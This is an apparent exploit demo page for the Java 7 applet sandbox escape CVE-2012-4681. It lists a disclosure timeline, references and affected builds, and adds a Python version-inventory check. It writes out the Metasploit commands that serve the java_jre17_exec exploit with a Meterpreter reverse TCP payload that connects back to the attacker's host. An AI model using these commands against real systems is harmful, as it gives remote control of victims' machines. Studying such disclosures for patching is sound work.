Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo

Timeline :

Vulnerability reported to ZDI by James Forshaw (tyranid)
Vulnerability reported to the vendor by ZDI on 2012-07-24
Vulnerability found exploited in the wild and discovered by Michael Schierl
First details of the vulnerability on 2012-08-26
Source code of the vulnerability provided by jduck on 2012-08-26
Metasploit PoC provided on 2012-08-27
Patched through out-of-band Oracle Security Alert for CVE-2012-4681 on 2012-08-30

PoC provided by :

Unknown
jduck
sinn3r
juan vazquez

Reference(s) :

CVE-2012-4681
OSVDB-84867
BID-55213
Zero-Day Season is Not Over Yet
Java 7 0-Day vulnerability information and mitigation
ZDI-12-197
Oracle Security Alert for CVE-2012-4681

Affected version(s) :

Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and previous.
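
An inventory check for the affected range above, added here as an example and not taken from the original post or the Metasploit module: it parses `java -version` output and flags Java 7 builds up to and including 1.7.0_06-b24. The function names, host names and sample outputs are constructed for illustration, and the range applied is only the one this page states.

```python
import re

# Last affected build according to this page: 1.7.0_06-b24 (Java 7 only).
LAST_AFFECTED = (6, 24)  # (update, build)
# Matches legacy version strings such as 1.7.0, 1.7.0_06 and 1.7.0_06-b24.
_VERSION_RE = re.compile(r"\b1\.(\d+)\.0(?:_(\d+))?(?:-b(\d+))?\b")

# Constructed sample `java -version` outputs keyed by hypothetical host names.
SAMPLE_INVENTORY = {
    "ws-01": 'java version "1.7.0_06"\n'
             'Java(TM) SE Runtime Environment (build 1.7.0_06-b24)\n',
    "ws-02": 'java version "1.7.0_07"\n'
             'Java(TM) SE Runtime Environment (build 1.7.0_07-b10)\n',
    "ws-03": 'java version "1.6.0_34"\n',
}


def parse_java_version(text):
    """Return (major, update, build) from the output; build may be None."""
    best = None
    for m in _VERSION_RE.finditer(text):
        major = int(m.group(1))
        update = int(m.group(2) or 0)
        build = int(m.group(3)) if m.group(3) else None
        # Prefer the match that carries a build number (the "build ..." line).
        if best is None or (best[2] is None and build is not None):
            best = (major, update, build)
    return best


def is_affected(text):
    """True if the reported version is Java 7 at or below 1.7.0_06-b24."""
    parsed = parse_java_version(text)
    if parsed is None:
        raise ValueError("no legacy 1.x.0 Java version string found")
    major, update, build = parsed
    if major != 7:
        return False  # outside the range this page lists
    if build is None:
        return update <= LAST_AFFECTED[0]  # unknown build: assume the worst
    return (update, build) <= LAST_AFFECTED


def affected_hosts(inventory):
    """Sorted host names whose reported Java version is in the range."""
    return sorted(h for h, out in inventory.items() if is_affected(out))


if __name__ == "__main__":
    print(affected_hosts(SAMPLE_INVENTORY))
```
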

Tested on Windows XP Pro SP3 & Ubuntu 12.04 with :

Internet Explorer 8 & Firefox 14.0.1 & Chrome
Oracle JSE 1.7.0_06-b24

Description :

This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

Commands :

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Windows 0day exploitation with Internet Explorer, Firefox and Chrome :

Linux Ubuntu 12.04 exploitation with Firefox :
